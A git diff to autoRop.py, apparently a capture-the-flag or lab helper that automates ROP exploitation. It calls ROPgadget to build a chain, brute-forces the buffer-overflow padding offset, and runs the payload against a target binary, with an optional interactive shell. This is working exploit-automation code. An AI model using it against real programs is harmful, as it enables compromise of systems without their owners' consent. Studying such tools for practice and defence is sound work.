diff --git a/autoRop.py b/autoRop.py index 3811e04..d1dbc25 100755 --- a/autoRop.py +++ b/autoRop.py @@ -72,24 +72,27 @@ def run_program(payload: str, **kwargs) -> process: def find_offset_inc(low: int, high: int): - for i in range(low, high + 1): - print(f" ├─[🤔] Trying payload {i}...") - subprocess.run( - [ - "ROPgadget", - "--binary", exec_file, - "--ropchain", - "--silent", - "--paddingLen", str(i), - "--ropFile", rop_file, - "--execFile", 'rop_exec_default.json', - ], - stdout = subprocess.DEVNULL - ) - - with open(rop_file, 'rb') as f: - p = run_program(f.read()) - if b'[ Successful ROP! ]' in p.readall(): + default_padding = 64 + print(f" ├─[🤔] Generating offset discovery payload...") + subprocess.run( + [ + "ROPgadget", + "--binary", exec_file, + "--ropchain", + "--silent", + "--paddingLen", str(default_padding), + "--ropFile", '/tmp/rop_file', + "--execFile", 'rop_exec_default.json', + ], + stdout = subprocess.DEVNULL + ) + with open('/tmp/rop_file', 'rb') as f: + original_payload = f.read()[default_padding:] + for i in range(low, high + 1): + print(f" ├─[🤔] Trying offset {i}...") + rop_payload = (b'A' * i) + original_payload + proc = run_program(rop_payload) + if b'[ Successful ROP! ]' in proc.readall(): print(f" └─[😳] Found offset at {i}!\n") return i @@ -155,13 +158,12 @@ if run: atexit.unregister(pwnlibexit._run_handlers) pwnlibexit._run_handlers() - print() - print(f"[ Run Program : ./{exec_file} {rop_file} ]") + print(f"\nExecuting {exec_file}...\n") with open(rop_file, 'rb') as f: - p = run_program(f.read()) + proc = run_program(f.read()) if interactive: term.init() - p.interactive() + proc.interactive() else: - print(p.recvall().decode('utf-8')) + print(proc.recvall().decode('utf-8'))